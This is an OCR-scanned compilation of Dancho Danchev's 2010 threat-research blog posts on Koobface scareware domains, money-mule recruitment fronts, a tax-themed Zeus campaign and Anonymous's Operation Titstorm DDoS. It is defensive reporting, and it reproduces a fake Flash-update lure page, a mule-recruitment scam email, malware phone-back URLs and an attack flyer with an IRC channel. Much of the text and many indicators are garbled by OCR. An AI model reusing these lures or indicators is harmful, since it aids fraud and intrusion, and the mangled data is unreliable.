download locations for scareware domains pushed by the Koobface botnet: 


Oni901s3feu6O .cn - Email: robertsimonkroon@gmail.com 
6j5aq93iu7yv4 .cn - Email: robertsimonkroon@gmail.com 
mf6gy4lj79ny5 .cn - Email: robertsimonkroon@gmail.com 
84u9wb2hsh4p6 .cn - Email: robertsimonkroon@gmail.com 
6pj2h8rqkhfw7 .cn - Email: robertsimonkroon@gmail.com 
7cib5fzf462g8 .cn - Email: robertsimonkroon@gmail.com 
7bs5nfzfkp8q8 .cn - Email: robertsimonkroon@gmail.com 
kt4Ilwumfhjb7a .cn - Email: robertsimonkroon@gmail.com 
q2bf0fzvjb5ca .cn - Email: robertsimonkroon@gmail.com 
rncocnspr44va .cn - Email: robertsimonkroon@gmail.com 
tleayoft9226b .cn - Email: robertsimonkroon@gmail.com 


4g04i9n76ttwd .cn - Email: robertsimonkroon@gmail.com 
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kzvi4iiutr1le .cn - Email: robertsimonkroon@gmail.com 
hxc7jitg7k57e .cn - Email: robertsimonkroon@gmail.com 
mfbj6pquvjv8e .cn - Email: robertsimonkroon@gmail.com 
mt3pvkfmpi7de .cn - Email: robertsimonkroon@gmail.com 
fb7pxcqyb45o0e .cn - Email: robertsimonkroon@gmail.com 
fyivbri3bOdyf .cn - Email: robertsimonkroon@gmail.com 
z6ailnvi94jgg .cn - Email: robertsimonkroon@gmail.com 
ue4x08f5myqdl .cn - Email: robertsimonkroon@gmail.com 
p7keflvui9fkl .cn - Email: robertsimonkroon@gmail.com 
gjpwsc5p7oe3m .cn - Email: robertsimonkroon@gmail.com 
fluqidfi3qkcm .cn - Email: robertsimonkroon@gmail.com 
7mx1z5jqOnt3o .cn - Email: robertsimonkroon@gmail.com 
3uxyctrlmiqeo .cn - Email: robertsimonkroon@gmail.com 
pOumob9k2g7mp .cn - Email: robertsimonkroon@gmail.com 
od32qjx6meqos .cn - Email: robertsimonkroon@gmail.com 
bnfdxhaelrgey .cn - Email: robertsimonkroon@gmail.com 


7zju2182i2zhz .cn - Email: robertsimonkroon@gmail.com 


Stay tuned for a massive Koobface related activities update, analyzing the gang’s 
multi-tasking throughout the entire January, 2010 - descriptive historical OSINT 
offers long-term value in cross-checking for connections. 


Related Koobface gang/botnet research: 
[28]How the Koobface Gang Monetizes Mac OS X Traffic 
[29]The Koobface Gang Wishes the Industry "Happy Holidays" 


[30]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 
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[31]Koobface Botnet Starts Serving Client-Side Exploits 
[32]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[33]Koobface Botnet’s Scareware Business Model - Part Two 
[34]Koobface Botnet’s Scareware Business Model - Part One 
[35]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[36]New Koobface campaign spoofs Adobe’s Flash updater 
[37]Social engineering tactics of the Koobface botnet 
[38]Koobface Botnet Dissected in a TrendMicro Report 
[39]Movement on the Koobface Front - Part Two 
[40]Movement on the Koobface Front 

[41]Koobface - Come Out, Come Out, Wherever You Are 


[42]Dissecting Koobface Worm’s Twitter Campaign 


The Diverse Portfolio of Fake Security Software Series: 

[43]A Diverse Portfolio of Fake Security Software - Part Twenty Four 
[44]A Diverse Portfolio of Fake Security Software - Part Twenty Three 
[45]A Diverse Portfolio of Fake Security Software - Part Twenty Two 
[46]A Diverse Portfolio of Fake Security Software - Part Twenty One 
[47]A Diverse Portfolio of Fake Security Software - Part Twenty 
[48]A Diverse Portfolio of Fake Security Software - Part Nineteen 
[49]A Diverse Portfolio of Fake Security Software - Part Eighteen 
[50]A Diverse Portfolio of Fake Security Software - Part Seventeen 
[51]A Diverse Portfolio of Fake Security Software - Part Sixteen 
[52]A Diverse Portfolio of Fake Security Software - Part Fifteen 


[53]A Diverse Portfolio of Fake Security Software - Part Fourteen 
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[54]A Diverse Portfolio of Fake Security Software - Part Thirteen 
[55]A Diverse Portfolio of Fake Security Software - Part Twelve 
[56]A Diverse Portfolio of Fake Security Software - Part Eleven 
[57]A Diverse Portfolio of Fake Security Software - Part Ten 
[58]A Diverse Portfolio of Fake Security Software - Part Nine 
[59]A Diverse Portfolio of Fake Security Software - Part Eight 
[60]A Diverse Portfolio of Fake Security Software - Part Seven 
[61]A Diverse Portfolio of Fake Security Software - Part Six 
[62]A Diverse Portfolio of Fake Security Software - Part Five 
[63]A Diverse Portfolio of Fake Security Software - Part Four 
[64]A Diverse Portfolio of Fake Security Software - Part Three 
[65]A Diverse Portfolio of Fake Security Software - Part Two 


[66]Diverse Portfolio of Fake Security Software 


This post has been reproduced from [67]Dancho Danchev’s blog. Follow him [68]on Twitter. 
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6.2.8 Keeping Money Mule Recruiters on a Short Leash - Part Two (2010-02-09 20:17) 


a 


What We Do Services Overview About us 


With [L]money mule recruitment syndicates continuing to expand their [2]geographically 
diverse inventories of gullible mules, keeping their operations on a short leash is becoming a 
tradition. What the non-existent organizations profiled in this post have in common with the 
non-existent organizations profiled before, is the vendor of money mule recruitment creative, 
thanks to whose standardization of the recruitment process, everyone willing to invest a 
modest amount of money can start recruiting. 


Despite [3]the ongoing mix of [4]abusing legitimate infrastructure ([5JWeb 2.0 services, 
dedicated hosting within legitimate ISPs - [6J/Tweet 1; [7]Tweet 2; [8]Tweet 3; [9]Tweet 4; 
[10]Tweet 5; [11]Tweet 6) and using purely malicious infrastructure, centralization is cybe- 
crime operations is still an inseparable part of the cybercrime ecosystem. 


Case in point is [12]AS47560 - [13]VESTEH-NET-as Vesteh LLC, where the cybercriminals 
have not only chosen to host their money mule recruitment domain portfolio, but also, the 
actual Zeus crimeware command and control servers. Pretty convenient indeed, however a 
minimalistic OPSEC attitude leading to increased exposure. 


The newly introduced money mule recruitment domains, rely on the same DIY web inter- 
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face, and the same "payment processing agent" agreement seen in previous campaigns. 
What’s naturally changing are the web page layouts combined with a new description of the 
non-existent company. Here’s a sample from the currently active ones: 


a 


What We Do Services Overview About us 


"Welcome to the world of Outsourcing. Never has a phenomenon been so all encompassing 
and empowering like outsourcing. Transcending beyond an industry’s vertical segments, 
outsourcing has become the "by default" strategy for all profit conscious organizations that 
struggle to retain their winning streak and high profitability. Today’s scenario in the business 
world is more competitive than what it was in the past. There is a growing realization that 
wisdom lies in consolidating the core competency functions and outsourcing the supplement. 
We are an online services marketplace in USA and Australia. Our goal is to empower busi- 
nesses with the absolute freedom to choose where to outsource their business needs to 
maximize their competitive advantage. We believe that "money saved due to outsourcing 
can be effectively and successfully utilized to focus more on strategic and core businesses 
functions". 


The fact that money mule recruiters aggregate contact details from career building web 
sites, isn’t new - see "[14]Major career web sites hit by spammers attack". Here are the 
[15]sample letters emailed to a prospective money mule, which [16]spotted the scam and 
avoided it: 
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time ~* 


sae ae, <] Y pe= 


pavers OSLO! He Eal “Manager Service 
= busineSseuli-Tinse tSourcing 


sCOmPELINS 


financi ial 


"After reviewing your resume online we have decided to propose you a Payment Processing 
Agent vacancy. 


My name is Sarah Forbes and I’m working at SUCCESS Group Inc. Our company is a 
well-known one. It was founded in the USA and deals mainly with recruitment of IT profession- 
als. The job we offer is a part-time position with a flexible schedule. On average the working 
hours are 2-3 hours a day (Monday through Friday). Our job requirements: Internet access 
and e-mail. Successful applicants are offered a probationary period (30 days). All agents get 
a training and online support. We evaluate the employees at least one week prior to the end 
of their trial period. NOTE: During the probationary period termination can be recommended 
by the supervisor. 


The pay is $2,300 per month during the Trial Period + 8 % commission from each suc- 
cessfully handled payment. Total income is about $4,500 per month. After the first 30 days 
your base salary will be increased up to $3,000 a month. NOTE: After the probationary period 
you may request additional assignments or proceed a full-time. If you are interested in the 
offer, please, contact me at success.sarah.forbes@googlemail.com for the details. 


el FORM_______FORM________FORM_____ 
Firstname: 
Lastname: 
Country of residence: 5 
Contact phone: =e 
Preferred catime: —§ == 
FORM FORM FORM 


Our representatives will reply within 48 hours. NOTE: This is not a sales position. 
Sincerely, 


Sarah Forbes 
SUCCESS Group Inc 
job@success-groupinc.tw 
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Phone: 1-585-267-5988 
Fax: 1-585-672-6137" 


Let’s expose the domain portfolios in question. 


aurora-groupco, tw 
aurora-groupe 


aurora-groupi 


aurora-groupi 


bear- 


financial-groupes 


Financial-groupin 


millennium-group 


millennium-gro 


00,164.21 su groupco, Ws 
Active money mule recruitment sites parked within AS47560 - VESTEH-NET-as Vesteh LLC, 
at 91.200.164.18; 91.200.164.19; 91.200.164.20; 91.200.164.21; and 91.200.164.22 in 
particular: 

aurora-groupco .tw - Email: dodo@fastermail.ru 

aurora-groupco .ws - Email: info@gtec.ru 

aurora-groupinc .tw - Email: cents@qx8.ru 

aurora-groupinc .ws - Email: info@gtec.ru 

bear-groupco .ws - Email: info@gtec.ru 

bear-groupinc .ws - Email: info@gtec.ru 

citizen-groupco .tw - Email: sane@qx8.ru 

citizen-groupco .ws - Email: info@gtec.ru 

citizengroupinc .ws - Email: info@gtec.ru 
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citizen-groupsvc .tw - Email: frown@fastermail.ru 
classic-groupco .ws - Email: info@gtec.ru 
classicgroupinc .ws - Email: info@gtec.ru 
classic-groupsvc .tw - Email: haste@fastermail.ru 
excel-groupco .tw - Email: thaws@bigmailbox.ru 
excel-groupinc .tw - Email: thaws@bigmailbox.ru 
excel-groupinc .ws - Email: info@gtec.ru 
financial-groupco .tw - Email: think@maillife.ru 
financial-groupco .ws - Email: info@gtec.ru 
financial-groupinc .tw - Email: sane@qx8.ru 
financial-groupsvc .ws - Email: info@gtec.ru 
market-vision .tw - Email: place@bigmailbox.ru 
market-visioninc .ws - Email: info@gtec.ru 
measure-groupco .tw - Email: cents@qx8.ru 
measure-groupco .ws - Email: info@gtec.ru 
measure-groupinc .tw - Email: cents@qx8.ru 
measure-groupinc .ws - Email: info@gtec.ru 
millennium-groupco .tw - Email: thaws@bigmailbox.ru 
millennium-groupinc .ws - Email: info@gtec.ru 
millennium-groupsvc .tw - Email: thaws@bigmailbox.ru 
millennium-groupsvc .ws - Email: info@gtec.ru 
nuris-groupco .tw - Email: rips@fastermail.ru 
nuris-groupco .ws - Email: info@gtec.ru 
nuris-groupinc .tw - Email: rips@fastermail.ru 
nuris-groupinc .ws - Email: info@gtec.ru 
render-groupco .tw - Email: muggy@freenetbox.ru 
success-groupco .ws - Email: info@gtec.ru 


Naturally, it gets even more interesting with AS47560 - VESTEH-NET-as Vesteh LLC acting as 
a good example of cybercrime-friendly virtual neighborhood. Not only are the cybercriminals 
hosting the money mule recruitment sites there, but also, a decent number of Zeus crimeware 
C &Cs, client-side exploit serving campaigns are currently active there. 
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Zeus C &Cs active at [17]91.200.164.44, front pages return "dsfkgjk rgkj" : 
com - Email: 
.com - Email: 
.com - Email: 
com - Email: 
com - Email: 
.com - Email: 
.com - Email: 
com - Email: 
com - Email: 


justinnewl 
justinnew2 
justinnew3 
justinnew4 
justinnew5 
justinnew6 
justinnew7 
justinnew8 
justinnew9 


— 


justinnew10 .com - Email 
justinnew11 .com - Email 
justinnewl12 .com - Email 
justinnewl2 .com - Email 
justinnew13 .com - Email 


3242dswewrf@yahoo.com 
3242dswewrf@yahoo.com 
3242dswewrf@yahoo.com 
3242dswewrf@yahoo.com 
3242dswewrf@yahoo.com 
3242dswewrf@yahoo.com 
3242dswewrf@yahoo.com 
3242dswewrf@yahoo.com 
3242dswewrf@yahoo.com 
: 3242dswewrf@yahoo.com 
: 3242dswewrf@yahoo.com 
: 3242dswewrf@yahoo.com 
: 3242dswewrf@yahoo.com 
: 3242dswewrf@yahoo.com 
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justinnew14 
justinnew15 
justinnew16 
justinnew17 
justinnew18 
justinnew19 
justinnew20 
justinnew21 
justinnew22 
justinnew23 
justinnew24 


Historical OSINT of live exploit serving, malware phone back locations parked at 91.200.164.44: 


com - Email: 
com - Email: 
com - Email: 
com - Email: 
com - Email: 
com - Email: 
com - Email: 
com - Email: 
com - Email: 
com - Email: 
com - Email: 


3242dswewrf@yahoo.com 
3242dswewrf@yahoo.com 
3242dswewrf@yahoo.com 
3242dswewrf@yahoo.com 
3242dswewrf@yahoo.com 
3242dswewrf@yahoo.com 
3242dswewrf@yahoo.com 
3242dswewrf@yahoo.com 
3242dswewrf@yahoo.com 
3242dswewrf@yahoo.com 
3242dswewrf@yahoo.com 


abecedarian .in - Email: joomasterx@yahoo.com 
absinthial .in - Email: joomasterx@yahoo.com 
acarine .in - Email: joomasterx@yahoo.com 
aeruginous .in - Email: jobmasterx@yahoo.com 
agrestic .in - Email: jobmasterx@yahoo.com 
alveolate .in - Email: joomasterx@yahoo.com 
anaclastic .in - Email: joomasterx@yahoo.com 
anatine .in - Email: joobmasterx@yahoo.com 
anconoid .in - Email: joobmasterx@yahoo.com 
ancoral .in - Email: joomasterx@yahoo.com 
anserine .in - Email: joobmasterx@yahoo.com 
archididascalian .in - Email: jobmasterx@yahoo.com 
arietine .in - Email: joobmasterx@yahoo.com 
babied .in - Email: jobmasterx@yahoo.com 
baffled .in - Email: joobmasterx@yahoo.com 
banal .in - Email: joomasterx@yahoo.com 
barren .in - Email: joomasterx@yahoo.com 
battle-worn .in - Email: joomasterx@yahoo.com 
bawled .in - Email: jobmasterx@yahoo.com 
beatific .in - Email: joobmasterx@yahoo.com 
beckoned .in - Email: joomasterx@yahoo.com 


betonomeshalkatraktor .in - Email: ynetsw@gmail.com 


fcaliber65 .in - Email: wert32@rambler.ru 

humpiiil .in - Email: wert32@rambler.ru 
izyvecheniyOtragladit .in - Email: ynetsw@gmail.com 
lifeberyt .in - Email: wert32@rambler.ru 
marrychristmasforyou .com - ACTIVE 
marrychristmasforyou .net - ACTIVE 

my1stdomain .in - Email: wert32@rambler.ru 
pingcrews .in - Email: joomasterx@yahoo.com 
razymniygluk .in - Email: ynetsw@gmail.com 
rescservuce .in - Email: wert32@rambler.ru 
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Name servers of notice: 

dns1l.yekt.net - 67.15.47.189 

ns1,trythisok.cn - 89.248.166.45 - chunk@qx8.ru 
ns1.basilkey.ws - 89.248.166.45 - info@gtec.ru 
ns2.maninwhite.cc - 38.99.169.210 - duly@fastermail.ru 
ns2.mythinregion.ws - Email: info@gtec.ru 

ns2.partytimee.cn - 38.99.169.208 - Email: chunk@qx8.ru 
ns3.cnnandpizza.cc - 195.182.57.36 - Email: bears@fastermail.ru 
ns3.partymorning.ws - 94.23.114.71 - Email: info@gtec.ru 


Take a look at the routing graph for a moment. Who do we have here? Our "dear friends" 
at [18]AS5577 ROOT eSolutions (also seen [19]here; [20]here; [21]here; [22]here; [23]here 
and [24]here) acting as a node to an ever expanding portfolio of malicious customers, with 
AS50215 Troyak-as Starchenko Roman Fedorovich part of the [25]Pushdo crimeware and 
[26]client-side exploit serving campaigns, [27]second in the list. 


AS47560 - VESTEH-NET-as Vesteh LLC has been notified, awaiting response/take down 
reaction. Or the lack of such. 


Related coverage of money laundering in the context of cybercrime: 
[28]Keeping Reshipping Mule Recruiters on a Short Leash 


3087 


[29]Keeping Money Mule Recruiters on a Short Leash 
[30]Standardizing the Money Mule Recruitment Process 
[31]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
[32]Money Mules Syndicate Actively Recruiting Since 2002 
[33]Inside a Money Laundering Group’s Spamming Operations 


This post has been reproduced from [34]Dancho Danchev’s blog. Follow him [35]on Twitter. 


: chev.blogs i . 

. http: //ddanchev. blogspot .com/2009/11/keeping-money-mule-recruiters-on-short.htm 
. http://blogs.zdnet .com/security/?p=229 
ter.com/da 


. http: //twitter.com/danchodanchev/status/8638311702 


p:// pot.co = 
http: //www.messagelabs.com/mlireport/MLI_2010_01_Jan_FINAL_EN. pdf 
. http:// nchodan tatus/863840 


/ 
ttp://blogs.zdnet.com/security/?p=1514 
/ 


_hetp:/ twitter .con/danchodanchev/status/2698505748 
_ http: //twitter.con/danchodanchev/status/8698623148 
10, hep: //ti ter. con/danchodanchev/ status/8636719256 


https ://zeustracker.abuse.ch/monitor .php?as=47560 


htt ddan m/2009/10/standardizing-money-mule-recruitment .htm 
twit chev/s 86 508 


. http: //google.com/safebrowsing/diagnostic?site=AS : 47560 


14. http://blogs.zdnet.com/security/?p=108 
15. http: //www.delphifaq.com/faq/scams/f1057 . shtml?p=22 
. http: //www.delphifaq.com/faq/scams/f1057. shtml?p=22 


. https://zeustracker.abuse.ch/monitor.php?ipaddress=91.200.164.44 


. http://hphosts. blogspot .com/2009/11/crimeware-friendly-isps-root-esolutions.htm 


19, hep: //ddancher.blogepot .con/2009/12/koobtace-friendly-riccon-1t€-a529550. html 
_ http: //adanchey blogspot. con/2009/02/cost-of-anonynizing-cybercriminalsnta 
| http: //adanchev blogspot. con/2009/12/diverse-port folio~of~fake- security html 
22. http: //ddanchev. blogspot .con/2008/08/us-federal-forns-blackhat~seo-thened html 


21 : - ity. 
http: //ddanchev. blogspot. com/2009/11/koobface-botnets-scareware-business. htm 
http: //ddanchev. blogspot .com/2009/05/diverse-portfolio-of-fake-security.htm 


. http: //ddanchev. blogspot .com/2010/01/pushdo-serving-crimeware-client-side.htm 


26. http: //ddanchev. blogspot .com/2010/02/photoarchive-crimewareclient-side.htm 
27. http: //ddanchev. blogspot .com/2010/01/outlook-web-access-themed-spam-campaign.htm 


. http: //ddanchev. blogspot .com/2009/12/keeping-reshipping-mule-recruiters-on. htm 


29. http: //ddanchev. blogspot .com/2009/11/keeping-money-mule-recruiters-on-short.htm 
. http: //ddanchev. blogspot .com/2009/10/standardizing-money-mule-recruitment .htm 
31. http: //ddanchev. blogspot .com/2008/07/money-mule-recruiters-use-asproxs-fast.htm 


http: //ddanchev. blogspot. com/2008/10/money-mules-syndicate-actively.htm 


. http: //ddanchev. blogspot . com/2009/05/inside-money- laundering-groups- spamming .htm. 


34. http://ddanchev.blogspot.com/ 
35. http://twitter.com/danchodanche 
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6.2.9 Tax Report Themed Zeus/Client-Side Exploits Serving Campaign in the Wild 
(2010-02-11 22:19) 


<html> <head> 
acta http-equiv="Content-Type” content=<"text/htmi: charset*IS0-0059-17> 
<link rele“stylesheet” type**text/css* href+"theme.c2s*> 

<title>You don’t have the latest version of Macromedia Flash Player</title> 
</head><hbody Leftmargin="0" 


topmargin="0" marginheight<"0" marginwidth="0"> 


" frameberder*"0" 


<table border="0" width="95%5 "> 

<thody><tr> 

<td width= "10"> 

<img sro="spacer.git” bhorder="0" height="25" width="10"> 
</td> 

<td valigne"bottom’> 

<font size="+1" fLace="Verdans, Geneva, Arial, Neivetica,sans-eerift">You don't heve the latest version of Nacromwedia Flash Piayer</fent> 
</td> 

</tr> 

<tr> 

<td> cnbep:</ta> 

<td class*"bodytext"> 


<p> 
<font face*"Arial, Helvetica, sana-serif">Thia site makes use of Nacromedia® Flash(TH) software. You've installed an old version of Macromedia Filast 
</p> 

<p> 

a href*"update.exe?Pi Prod Version*Shockwvaver 

<img sro*"flash get.git" border="0" height+"3i" width*"S8"></a></p> 

<p> 

(font face*"irial, Helvetica, sana-serif”>Why not download and install the latest version now? Ie will only take a moment.</font> 

</p> 

<p> 

<font size*"~2" fLace*"Verdana, Arial, Helvetica, sans-serif”">Macromedia and Flash are trademarks of Macromedia, Inc.</font> 

/p> 

</td> 


-git" border+"0" height*"1" width*"100e"><br> 
FF">State Revenue Jervice</fent></p> 


A currently ongoing malware campaign courtesy of the gang that’s been busy rotation themes 
over the past few weeks, has changed the theme to "You are in a higher tax bracket", and 
continues serving client-side exploits next to a Zeus crimeware sample using a bogus "You 
don’t have the latest version of Macromedia Flash Player" error message. 


- Sample URL: rep1031 .be/reports/getreport.php?email=email - Email: souchuck@yahoo.com. 
The following currently suspended domains are also involved - rep1032 .be; rep1030.me 
.uk; rep1031.me .uk; rep1032.me .uk; rep1030.co .uk; rep1031.co .uk; rep1032.co .uk; 
rep1043.me .uk; rep1041.co .uk; rep1032.co .uk 
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___ et ge 116.80.0.0714 ———42-_-> 52510 
116.80.31.193 


__ ney ge 117.205.144.0/20 —_——AS_e 459829 
117.205.144.105 


—— 189.192.0.0/13 ————4S-_w» =s13999 
189.193,207.0 
_ 189,6.16.0/20 ———___AS_-ge 528573 
i 
189.6.22.239 
201.231.224.019 —————4S_-gm asi0318 
NE 
201.231.246.70 ———PTR_ gy 70.246-231-201 fibertel.com.ar 
201.68.104.150 ——UEL______» 201.68.0.017 ——————“S_m» s27699 
24,54,219.75 ——WEL—_— ge 9 24.54.219.024 ————“S-_m» s11992 
rep1044.co.kr A 75.17259.17 ———H&L—___—> 75.160.0.0/12. —————“S— 5209 
TR 


87.70.127.221 75-172-59-17.tukw.qwest.net 


——_ 
87.70.64,0/18 ——-_—AS_gy 459116 


88.204,215.101 


Tee 
88.204.128.0/17 —————_4S_m» as9198 
93.177.185.72 —w__ 

93,177.160,0/19 ———__-_—“S_ge 420771 


PTR 


> 


NS 


nsl.sociatworc.net 


ip-93-177-185-72.caucasus.net 
ns1.trintmens.net 


ns2.sociatworc_net AS? 


co.kr 


- UPDATED: The most recently spamvertised domains include: 
rep1041 .kr - Email: Souchuck@yahoo.com 
rep1042 .kr - Email: Souchuck@yahoo.com 
rep1043 .kr - Email: Souchuck@yahoo.com 
rep1044 .kr - Email: Souchuck@yahoo.com 
rep1041.ne .kr - Email: Souchuck@yahoo.com 
rep1042.ne .kr - Email: Souchuck@yahoo.com 
rep1043.ne .kr - Email: Souchuck@yahoo.com 
rep1041.co .kr - Email: Souchuck@yahoo.com 
rep1042.co .kr - Email: Souchuck@yahoo.com 
rep1043.co .kr - Email: Souchuck@yahoo.com 
rep1044.co .kr - Email: Souchuck@yahoo.com 
rep1041.or .kr - Email: Souchuck@yahoo.com 
rep1042.or .kr - Email: Souchuck@yahoo.com 
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rep1043.or .kr - Email: Souchuck@yahoo.com 
rep1044.or .kr - Email: Souchuck@yahoo.com 


- Sample detection rate: 


update.exe -  [1]PWS:Win32/Zbot.RS - — Result: 8/41 (19.52 %); MD5: 
44028f0e2fa3ec70507992cb0684ff58 


- Name servers of notice: 

ns1.socialworc .net - 87.117.245.9 - Email: storylink@live.com 
nsl.trintmens .net - 87.117.245.9 

nsl.inserthelping .net - suspended 

ns1.citysatellites .net - down 


- Sample message: "Dear taxpayer, The Federal income tax is a progressive tax, mean- 
ing that the more you earn, the higher your tax rate. Your tax rate depends not just upon your 
taxable income, but also upon your filing status (single, married filing jointly, etc.). You’re in a 
higher tax bracket because: - your annual income for the last tax year has increased. Please 
review your annual tax report immediately at: get report." 


You don't have the latest version of Macromedia Flash Player 
This site mates use of Mac oftware You've instafed an cfd version of Macrom 


acromeda® Flash(TW) sc@ware iv stafed an cfd ve > eda Flash Player Mat cannot ota 


ook 
WS Ratt 


- Sample iFrame used: 109.95.115.36 /uzs/in.php also used in last [2]week’s PhotoArchive 
campaign; - AS50215 - Troyak-as Starchenko Roman Fedorovich - akanyovskiy@troyak.org; 


akanyovskiy@vishclub.net and serving CVE-2007-5659; CVE-2008-2992; CVE-2009-0927; 
CVE-2009-4324. 
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114.186.245.125 ——WED ge 114.160.0.0/11 ——-_———AS pe 9 si713 
116.80.31.193 ———LEL > 116.80.0.0/14 ——————“2-> 52510 
me 186.81.98.0/22 ——-__—4#Z_-g® 4510620 


ner ge 189.18.0.0716 —————4S-_> 27699 
189.18.189.8 


190.11.10.0/24 ——__—4#S-_-ge s14420 


EL 
190.11.10.128 
201.231.224.019 ———_—“-g> AS10318 
NET 


201.231.246,.70 ——CIR_-gy 70.246-231-201.tibertel.com.ar 


75.160.0.0/12 —————“—> 5209 


75.172.59.17 pTR 
cS 75-172-59-17.tukw.qwestnet 

87.70,127.221 t AS 
—tif 9770.64.08 ——___“S-_-_m» asoue 


rep1031.be 


A 
88.204.215.101 ner 
a 88.204.128,0/17 


AS9198 


AS 
A 92.46.101.119 yer oe 
92.46.64.0/18 


93.177.185.72 NET As 
= 93.177.160.0/19 —————S_> as20771 


nsl.gompleynet 


ip-93-177-185-72. caucasus.net 


nsL.noockynet 


up ns2.gompley.net 


ns2.hoockynet 


be 


- Sample malware detection rate/phone back C &Cs: update.exe - [3]Trojan- 
Spy.Win32.Zbot.gen - Result: 8/41 (19.52 %), MD5: f15d88ac3e381laeb6b3779b0dd7042ce. 


Upon execution phones back to [4]trollar .ru/cnf/trl.jpg - 109.95.114.133 - Email: bernardo 
_pr@inbox.ru; [5]AS50369 - VISHCLUB-AS Kanyovskiy Andriy Yuriyovich. Email was also used 
to register the Zeus C &C from last week’s "[6]PhotoArchive Crimeware/Client-Side Exploits 
Serving Campaign in the Wild" campaign. 


- Name servers of notice: nsl.gompley .net - 74.117.63.218 - Email: storylink@live.com; 
nsl.hoocky .net - 74.117.63.218 - Email: footboolfan7@aol.com, also Known to have been 
parked on the same IP are ns1.allhostinfo .com - Email: line@metalfan.com; ns1.helpgoldbank 
-net - Email: glonders@gmail.com and ns1.drowthdb .com. 


- Second portfolio of related name servers: the second portfolio is parked at 62.19.3.2 
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- nsl.faktorypro .com - Email: poolbill@hotmail.com; ns1.x-videocovers .net - Email: sto- 
rylink@live.com; nsl.serwisezone .net - Email: line@metalfan.com; nsl.guarantexpres .com; 
ns1.respectiveowners .net 


Updates will be posted as soon as new developments emerge. 


Related coverage of the gang’s previous campaigns: 

[7]PhotoArchive Crimeware/Client-Side Exploits Serving Campaign in the Wild 
[8]Facebook/AOL Update Tool Soam Campaign Serving Crimeware and Client-Side Exploits 
[9]Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams 

[10]Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware 

[11]Pushdo Injecting Bogus Swine Flu Vaccine 

[12]"Your mailbox has been deactivated" Spam Campaign Serving Crimeware 
[13]Ongoing FDIC Spam Campaign Serves Zeus Crimeware 

[14]The Multitasking Fast-Flux Botnet that Wants to Bank With You 


This post has been reproduced from [15]Dancho Danchev’s blog. Follow him [16]on Twitter. 


1 
2. 

3. 
15258 

4 

5. 

. 

7 

8. 

9 


ttp://ddanchev.blogspot.com/2010/01/pushdo-serving-crimeware-client-side.htm 


10. http://ddanchev. blogspot .com/2010/01/outlook-web-access-themed-spam- campaign. htm 


ttp://ddanchev. blogspot .com/2009/12/pushdo-injecting-bogus-swine-flu.htm 


12. http://ddanchev. blogspot .com/2009/11/your-mailbox-has-been-deactivated-spam.htm 


ttp://ddanchev. blogspot .com/2009/10/ongoing-fdic-spam-campaign-serves-zeus.htm 


14. http://ddanchev. blogspot .com/2009/07/multitasking-fast-flux-botnet-that .htm 
15. http://ddanchev. blogspot .com/ 
16. http://twitter .com/danchodanche 
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6.2.10 ’Anonymous’ Group’s DDoS Operation Titstorm (2010-02-12 01:40) 


6.2.11 ‘Anonymous’ Group’s DDoS Operation Titstorm (2010-02-12 01:40) 


OPERATION: TITSTORM 


A PART OF OPERATION INTERNET FREEDOM 
THE ATTACK! WHAT? WHEN? 


1. On February 10th 8:00 AM Australian time PARTICIPATE FELLOW ANONYMOUS! 


we will begin a DDoS of government servers The Campaign begins.. 


2. This will be quickly followed by a shitstorm Me AM "Aes TRALIAN TIME (GMT +10:00 
of porn email, fax spam, black faxes, and ebruary 710th. 


prank phone calls to government offices (FEBRUARY 9TH FOR 


(emails/faxes should focus on small-breasted 
porn, cartoon porn, and female ejaculation, U.S.A. AND CANADA.) 
the 3 types banned so far) (5:00 EST | 4:00 CST | etc. ) 


3. Information on the targets for the shitstorm TO FULLY PARTICIPATE IN THE ATTACK: 
can be found here: 

HTTP: //UUULRPH.GOUAU/OPS/RONINISTRATI Use an IRC Client and connect to... 

fi T es 

gh Server: irc.anonnet.org 


Channel: #titstorm 


"We are Anonynnous, We are legion.” 
Regards, Anonymous 


With last months [1]’Anonymous’ Group’s DDoS Operation Titstorm campaign a clear success 
based on the real-time monitoring of the crowdsourcing-driven attack, it’s time to take a brief 
retrospective on the tools and tactics used, and relate 


¢ Go through an analysis of 2009’s failed [2]Operation Didgeridie DDoS campaign 


Why is Operation Titstorm an important one to profile? Not only because it worked compared 
to [3]Operation Didgeridie, but also, due to the fact that crowdsourcing driven (malicious 
culture of participation) DDoS attacks have proven themselves throughout the past several 
years, as an alternative to DDoS for hire attacks. 


- DIY ICMP flooders 

- Web based multiple iFrame loaders to consume server CPU 

- Web based email bombing tools+predefined lists of emails belonging to government offi- 
cials/employees 


Go through related posts on crowdsourcing DDoS attacks/malicious culture of participa- 
tion: 
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[4]Coordinated Russia vs Georgia cyber attack in progress 

[5]lranian opposition launches organized cyber attack against pro-Ahmadinejad sites 
[6]People’s Information Warfare Concept 

[7]Electronic Jihad v3.0 - What Cyber Jihad Isn’t 

[8]Electronic Jihad’s Targets List 

[9]The DDoS Attack Against CNN.com 

[10]Chinese Hacktivists Waging People’s Information Warfare Against CNN 
[11]The Russia vs Georgia Cyber Attack 

[12]Real-Time OSINT vs Historical OSINT in Russia/Georgia Cyberattacks 
[13]Pro-Israeli (Pseudo) Cyber Warriors Want your Bandwidth 

[14]lranian Opposition DDoS-es pro-Ahmadinejad Sites 


This post has been reproduced from [15]Dancho Danchev’s blog. Follow him [16]on Twitter. 


1. bttp://www.smh.com.au/technology/technology-news/operation-titstorm-hackers-bring-down-government-website 


“hetp://blogs2dnet con/ security /?pe4234 
oo lors eee cleo 
_hvtp://ologs net con/security/?p1670 
_hvtp://ologs net -con/securit)/?p-3613 
[eee OT ee TTT 
ttp://ddanchev. blogspot .com/2007/11/electronic- jihad-v30-what-cyber-jihad.htm 
Fic /famacaay sloaepot con 2001 /ia/etaceronte jamaca-eargets tune neal 
http: //ddanchev blogspot . com/2008/04/ddos-attack- against cnncom.htm] 
10, cas: acu che espe cox 2008 (00/ chases tcce seats waqtae_eepiaa eal 
_hvtp://adanchev. blogspot com/2008/06/russia-ve~goorgia~cyber-attack. ht 


11 
12. http://ddanchev. blogspot .com/2008/10/real-time-osint-vs-historical-osint-in.htm 


H 
ne 


ttp://ddanchev. blogspot .com/2009/01/pro-israeli-pseudo-cyber-warriors-want.htm 


pay 
> 


